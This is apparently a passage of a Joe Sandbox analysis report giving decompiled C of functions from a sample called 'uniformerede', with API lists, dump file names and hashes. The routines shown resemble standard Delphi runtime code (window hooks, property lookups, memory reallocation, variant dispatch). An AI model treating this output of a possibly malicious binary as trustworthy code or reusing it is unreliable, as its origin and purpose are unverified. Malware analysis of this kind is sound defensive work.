                                                                                                                                                                                                                            				DWORD* _t20;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                            				_t19 = __eax;
                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                            				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
                                                                                                                                                                                                                            					_t9 =  *0x49eb28; // 0x0
                                                                                                                                                                                                                            					if(GlobalFindAtomA(E00404E80(_t9)) !=  *0x49eb24) {
                                                                                                                                                                                                                            						_t16 = 0 | E00437E28(_t19, _t17) != 0x00000000;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t16 = 0 | GetPropA(_t19,  *0x49eb24 & 0x0000ffff) != 0x00000000;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t16;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00438CED
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00438D58,00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438CF6
                                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 00438D0B
                                                                                                                                                                                                                            • GetPropA.USER32 ref: 00438D22
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2582817389-0
                                                                                                                                                                                                                            • Opcode ID: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                                                                                                                                                                                            • Instruction ID: e92755073dd59f3c21f23970beea19c54b642f04f63fe31ed46c29e0623daff0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17F02761B06722539621B3775D8196F518C9E383A8B10453FF840D23C1CA2CFC42C17F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E00437E5C(struct HWND__* __eax, void* __ecx) {
                                                                                                                                                                                                                            				intOrPtr _t5;
                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                            				DWORD* _t16;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t13 = __ecx;
                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                            				_t12 = __eax;
                                                                                                                                                                                                                            				_t15 = 0;
                                                                                                                                                                                                                            				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
                                                                                                                                                                                                                            					_t5 =  *0x49eb2c; // 0x0
                                                                                                                                                                                                                            					if(GlobalFindAtomA(E00404E80(_t5)) !=  *0x49eb26) {
                                                                                                                                                                                                                            						_t15 = E00437E28(_t12, _t13);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t15 = GetPropA(_t12,  *0x49eb26 & 0x0000ffff);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t15;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                                                                                                                                                                                            • GetPropA.USER32 ref: 00437E9E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2582817389-0
                                                                                                                                                                                                                            • Opcode ID: 12e1309046830def7c7591e3640ab464f98edbea615ae7cca6562d9d5199258a
                                                                                                                                                                                                                            • Instruction ID: 314671358fdb4042d771ff6fe008545e316f8929ccac966e84d460348b4874f5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12e1309046830def7c7591e3640ab464f98edbea615ae7cca6562d9d5199258a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF037E2A0C22556D630F7B75C8292B259D8A1C3A6700557BF981E7346D53CFC00C2BE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458F44(void* __ecx) {
                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                            				DWORD* _t7;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            				if( *((char*)(_t2 + 0xa5)) == 0) {
                                                                                                                                                                                                                            					if( *0x49ebd0 == 0) {
                                                                                                                                                                                                                            						_t2 = SetWindowsHookExA(3, E00458F00, 0, GetCurrentThreadId());
                                                                                                                                                                                                                            						 *0x49ebd0 = _t2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *0x49ebcc == 0) {
                                                                                                                                                                                                                            						_t2 = CreateEventA(0, 0, 0, 0);
                                                                                                                                                                                                                            						 *0x49ebcc = _t2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *0x49ebd4 == 0) {
                                                                                                                                                                                                                            						_t2 = CreateThread(0, 0x3e8, E00458EA4, 0, 0, _t7);
                                                                                                                                                                                                                            						 *0x49ebd4 = _t2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458F5C
                                                                                                                                                                                                                            • SetWindowsHookExA.USER32 ref: 00458F6C
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00458F87
                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00458FAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread$CurrentEventHookWindows
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1195359707-0
                                                                                                                                                                                                                            • Opcode ID: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                                                                                                                                                                                            • Instruction ID: 57ffb722b27d6620bd0413708f68fc30d075597d86d482f7219fb2c4a52a2897
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60F0D0B1A88301AEF710E7269C06F163655A724B1BF10413FF606791D2CFBC64888B1D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                                                                            			E00460AA0(signed int __eax) {
                                                                                                                                                                                                                            				signed int _t1;
                                                                                                                                                                                                                            				signed int _t2;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t1 = __eax;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_t2 = __eax;
                                                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                                                            				_push(__eax);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				_push(0xe);
                                                                                                                                                                                                                            				_push(__eax);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				if(__eax * __eax > 8) {
                                                                                                                                                                                                                            					 *0x49c08f = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *0x49c08f = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t2);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				return _t1;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AA4
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AAE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AB8
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AD8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                                                                                                                                                                                            • Instruction ID: e5fe4370b8b3d872c1f259c9bd4e612fc1c14159820c3ed1a6be214ca3dc50fe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE08C52A49354A8F26032B90C87B6B094C8B213A9F04443BFD017A1C3E4BD1C4492BF
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407A04(void* __eax, int __ecx, long __edx) {
                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 = GlobalHandle(__eax);
                                                                                                                                                                                                                            				GlobalUnWire(_t2);
                                                                                                                                                                                                                            				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                                                                                                                                                                                                                            				GlobalFix(_t4);
                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$AllocHandleWire
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2210401237-0
                                                                                                                                                                                                                            • Opcode ID: b4c34fbc1b13ea6a858e844dfc3f0a34d9fd416c56990660549c196e3363f7a4
                                                                                                                                                                                                                            • Instruction ID: 29c6e5d5043a0d7070d9946f6a7af6df8548ecb0a33a5036fe490b322c4e14a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4c34fbc1b13ea6a858e844dfc3f0a34d9fd416c56990660549c196e3363f7a4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12B002F4C5820538EA5433B24C0FD3F111C99947093804A6E7840BA2C7987DB846407F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E0047847C(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				signed int* _v24;
                                                                                                                                                                                                                            				signed int* _v28;
                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                            				signed int* _v36;
                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				char _v84;
                                                                                                                                                                                                                            				signed int _v1620;
                                                                                                                                                                                                                            				signed int _t142;
                                                                                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                                                                                            				intOrPtr* _t144;
                                                                                                                                                                                                                            				intOrPtr _t147;
                                                                                                                                                                                                                            				signed char _t157;
                                                                                                                                                                                                                            				signed char _t158;
                                                                                                                                                                                                                            				signed int* _t165;
                                                                                                                                                                                                                            				signed int _t207;
                                                                                                                                                                                                                            				signed int _t208;
                                                                                                                                                                                                                            				void* _t209;
                                                                                                                                                                                                                            				intOrPtr _t224;
                                                                                                                                                                                                                            				intOrPtr _t225;
                                                                                                                                                                                                                            				intOrPtr _t226;
                                                                                                                                                                                                                            				intOrPtr _t227;
                                                                                                                                                                                                                            				signed int _t256;
                                                                                                                                                                                                                            				intOrPtr* _t258;
                                                                                                                                                                                                                            				void* _t260;
                                                                                                                                                                                                                            				void* _t261;
                                                                                                                                                                                                                            				intOrPtr _t262;
                                                                                                                                                                                                                            				void* _t276;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t276 = __fp0;
                                                                                                                                                                                                                            				_t260 = _t261;
                                                                                                                                                                                                                            				_t262 = _t261 + 0xfffff9b0;
                                                                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                                                                            				_t258 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t224 =  *0x417dc0; // 0x417dc4
                                                                                                                                                                                                                            				E004053AC( &_v84, _t224);
                                                                                                                                                                                                                            				_push(_t260);
                                                                                                                                                                                                                            				_push(0x4787af);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t262;
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_t211 = 0;
                                                                                                                                                                                                                            				_push(_t260);
                                                                                                                                                                                                                            				_push(0x47878c);
                                                                                                                                                                                                                            				_push( *[fs:ecx]);
                                                                                                                                                                                                                            				 *[fs:ecx] = _t262;
                                                                                                                                                                                                                            				_t256 =  *(__edx + 1) & 0x000000ff;
                                                                                                                                                                                                                            				if(_t256 > 0x40) {
                                                                                                                                                                                                                            					_t211 =  *0x49d980; // 0x477e3c
                                                                                                                                                                                                                            					E0040D200(_t211, 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t256 == 0) {
                                                                                                                                                                                                                            					L25:
                                                                                                                                                                                                                            					_v52 =  &_v1620;
                                                                                                                                                                                                                            					_v48 = _v12 + 4;
                                                                                                                                                                                                                            					_v44 = _t256;
                                                                                                                                                                                                                            					_v40 = 0;
                                                                                                                                                                                                                            					_t225 =  *_v12;
                                                                                                                                                                                                                            					_t142 =  *_t258;
                                                                                                                                                                                                                            					if(0 != 4) {
                                                                                                                                                                                                                            						__eflags = 0 - 1;
                                                                                                                                                                                                                            						if(0 == 1) {
                                                                                                                                                                                                                            							__eflags = _t256;
                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                            								__eflags = _a4;
                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                            									_t142 = 3;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if((_v1620 & 0x00000fff) == 9) {
                                                                                                                                                                                                                            							_t142 = 8;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *_v12 = 0xfffffffd;
                                                                                                                                                                                                                            						_v48 = _v48 - 4;
                                                                                                                                                                                                                            						_v40 = _v40 + 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push( &_v84);
                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                            					_push( &_v52);
                                                                                                                                                                                                                            					_push(_t142);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t143 =  *0x49d770; // 0x49b500
                                                                                                                                                                                                                            					_push(_t143);
                                                                                                                                                                                                                            					_push(_t225);
                                                                                                                                                                                                                            					_t144 = _v8;
                                                                                                                                                                                                                            					_push(_t144);
                                                                                                                                                                                                                            					if( *((intOrPtr*)( *_t144 + 0x18))() != 0) {
                                                                                                                                                                                                                            						E00478A5C();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t207 = _v20;
                                                                                                                                                                                                                            					if(_t207 == 0) {
                                                                                                                                                                                                                            						L39:
                                                                                                                                                                                                                            						_t147 = 0;
                                                                                                                                                                                                                            						_pop(_t226);
                                                                                                                                                                                                                            						 *[fs:eax] = _t226;
                                                                                                                                                                                                                            						_push(0x478793);
                                                                                                                                                                                                                            						_t208 = _v20;
                                                                                                                                                                                                                            						if(_t208 == 0) {
                                                                                                                                                                                                                            							L41:
                                                                                                                                                                                                                            							return _t147;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							L40:
                                                                                                                                                                                                                            							_t208 = _t208 - 1;
                                                                                                                                                                                                                            							_t147 =  *((intOrPtr*)(_t260 + _t208 * 8 - 0x250));
                                                                                                                                                                                                                            							_push(_t147);
                                                                                                                                                                                                                            							L00417E14();
                                                                                                                                                                                                                            						} while (_t208 != 0);
                                                                                                                                                                                                                            						goto L41;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							_t207 = _t207 - 1;
                                                                                                                                                                                                                            							_t148 = _t260 + _t207 * 8 - 0x250;
                                                                                                                                                                                                                            							_t227 =  *((intOrPtr*)(_t260 + _t207 * 8 - 0x250 + 4));
                                                                                                                                                                                                                            							_t272 = _t227;
                                                                                                                                                                                                                            							if(_t227 != 0) {
                                                                                                                                                                                                                            								E00405950( *_t148,  *_t148, _t227, _t272);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} while (_t207 != 0);
                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v24 = _a8;
                                                                                                                                                                                                                            					_v28 = _t260 + (_t256 + _t256) * 8 - 0x650;
                                                                                                                                                                                                                            					_t209 = 0;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_v28 = _v28 - 0x10;
                                                                                                                                                                                                                            						_t157 =  *((intOrPtr*)(_t258 + _t209 + 3));
                                                                                                                                                                                                                            						_v16 = _t157 & 0x7f;
                                                                                                                                                                                                                            						_t158 = _t157 & 0x00000080;
                                                                                                                                                                                                                            						if(_v16 != 0xa) {
                                                                                                                                                                                                                            							__eflags = _v16 - 0x48;
                                                                                                                                                                                                                            							if(_v16 != 0x48) {
                                                                                                                                                                                                                            								__eflags = _t158;
                                                                                                                                                                                                                            								if(_t158 == 0) {
                                                                                                                                                                                                                            									__eflags = _v16 - 0xc;
                                                                                                                                                                                                                            									if(_v16 != 0xc) {
                                                                                                                                                                                                                            										 *_v28 = _v16;
                                                                                                                                                                                                                            										_v28[2] =  *_v24;
                                                                                                                                                                                                                            										__eflags = _v16 - 5;
                                                                                                                                                                                                                            										if(_v16 >= 5) {
                                                                                                                                                                                                                            											__eflags = _v16 - 7;
                                                                                                                                                                                                                            											if(_v16 <= 7) {
                                                                                                                                                                                                                            												_t93 =  &_v24;
                                                                                                                                                                                                                            												 *_t93 =  &(_v24[1]);
                                                                                                                                                                                                                            												__eflags =  *_t93;
                                                                                                                                                                                                                            												_v28[3] =  *_v24;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										__eflags =  *_v24 - 0x100;
                                                                                                                                                                                                                            										if( *_v24 != 0x100) {
                                                                                                                                                                                                                            											_t165 = _v24;
                                                                                                                                                                                                                            											 *_v28 =  *_t165;
                                                                                                                                                                                                                            											_v28[1] = _t165[1];
                                                                                                                                                                                                                            											_t211 = _v28;
                                                                                                                                                                                                                            											_v28[2] = _t165[2];
                                                                                                                                                                                                                            											_v28[3] = _t165[3];
                                                                                                                                                                                                                            											_v24 =  &(_v24[3]);
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_v36 = _t260 + _v20 * 8 - 0x250;
                                                                                                                                                                                                                            											 *_v36 = E00405974(_v24[2], _t211);
                                                                                                                                                                                                                            											_v36[1] = 0;
                                                                                                                                                                                                                            											 *_v28 = 8;
                                                                                                                                                                                                                            											_v28[2] =  *_v36;
                                                                                                                                                                                                                            											_v20 = _v20 + 1;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _v16 - 0xc;
                                                                                                                                                                                                                            								if(_v16 == 0xc) {
                                                                                                                                                                                                                            									__eflags =  *( *_v24) - 0x100;
                                                                                                                                                                                                                            									if( *( *_v24) == 0x100) {
                                                                                                                                                                                                                            										_t211 = 8;
                                                                                                                                                                                                                            										E00411330( *_v24, 8,  *_v24, _t256, _t276);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								 *_v28 = _v16 | 0x00004000;
                                                                                                                                                                                                                            								_v28[2] =  *_v24;
                                                                                                                                                                                                                            								goto L23;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v32 = _t260 + _v20 * 8 - 0x250;
                                                                                                                                                                                                                            								__eflags = _t158;
                                                                                                                                                                                                                            								if(_t158 == 0) {
                                                                                                                                                                                                                            									 *_v32 = E00405974( *_v24, _t211);
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            									 *(_v32 + 4) = 0;
                                                                                                                                                                                                                            									 *_v28 = 8;
                                                                                                                                                                                                                            									_v28[2] =  *_v32;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									 *_v32 = E00405974( *( *_v24), _t211);
                                                                                                                                                                                                                            									 *(_v32 + 4) =  *_v24;
                                                                                                                                                                                                                            									 *_v28 = 0x4008;
                                                                                                                                                                                                                            									_v28[2] = _v32;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_v20 = _v20 + 1;
                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                            								_t98 =  &_v24;
                                                                                                                                                                                                                            								 *_t98 =  &(_v24[1]);
                                                                                                                                                                                                                            								__eflags =  *_t98;
                                                                                                                                                                                                                            								goto L24;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							 *_v28 = 0xa;
                                                                                                                                                                                                                            							_v28[2] = 0x80020004;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L24:
                                                                                                                                                                                                                            						_t209 = _t209 + 1;
                                                                                                                                                                                                                            					} while (_t256 != _t209);
                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x004784bc
                                                                                                                                                                                                                            0x004784bf
                                                                                                                                                                                                                            0x004784c6
                                                                                                                                                                                                                            0x004784c8
                                                                                                                                                                                                                            0x004784d5
                                                                                                                                                                                                                            0x004784da
                                                                                                                                                                                                                            0x004784da
                                                                                                                                                                                                                            0x004784e1
                                                                                                                                                                                                                            0x004786aa
                                                                                                                                                                                                                            0x004786b0
                                                                                                                                                                                                                            0x004786b9
                                                                                                                                                                                                                            0x004786bc
                                                                                                                                                                                                                            0x004786c4
                                                                                                                                                                                                                            0x004786ca
                                                                                                                                                                                                                            0x004786ce
                                                                                                                                                                                                                            0x004786d3
                                                                                                                                                                                                                            0x004786fd
                                                                                                                                                                                                                            0x00478700
                                                                                                                                                                                                                            0x00478702
                                                                                                                                                                                                                            0x00478704
                                                                                                                                                                                                                            0x00478706
                                                                                                                                                                                                                            0x0047870a
                                                                                                                                                                                                                            0x0047870c
                                                                                                                                                                                                                            0x0047870c
                                                                                                                                                                                                                            0x0047870a
                                                                                                                                                                                                                            0x00478704
                                                                                                                                                                                                                            0x004786d5
                                                                                                                                                                                                                            0x004786e4
                                                                                                                                                                                                                            0x004786e6
                                                                                                                                                                                                                            0x004786e6
                                                                                                                                                                                                                            0x004786ee
                                                                                                                                                                                                                            0x004786f4
                                                                                                                                                                                                                            0x004786f8
                                                                                                                                                                                                                            0x004786f8
                                                                                                                                                                                                                            0x00478711
                                                                                                                                                                                                                            0x00478716
                                                                                                                                                                                                                            0x0047871a
                                                                                                                                                                                                                            0x0047871e
                                                                                                                                                                                                                            0x0047871f
                                                                                                                                                                                                                            0x00478720
                                                                                                                                                                                                                            0x00478722
                                                                                                                                                                                                                            0x00478727
                                                                                                                                                                                                                            0x00478728
                                                                                                                                                                                                                            0x00478729
                                                                                                                                                                                                                            0x0047872c
                                                                                                                                                                                                                            0x00478734
                                                                                                                                                                                                                            0x00478739
                                                                                                                                                                                                                            0x00478739
                                                                                                                                                                                                                            0x0047873e
                                                                                                                                                                                                                            0x00478743
                                                                                                                                                                                                                            0x00478765
                                                                                                                                                                                                                            0x00478765
                                                                                                                                                                                                                            0x00478767
                                                                                                                                                                                                                            0x0047876a
                                                                                                                                                                                                                            0x0047876d
                                                                                                                                                                                                                            0x00478772
                                                                                                                                                                                                                            0x00478777
                                                                                                                                                                                                                            0x0047878b
                                                                                                                                                                                                                            0x0047878b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478779
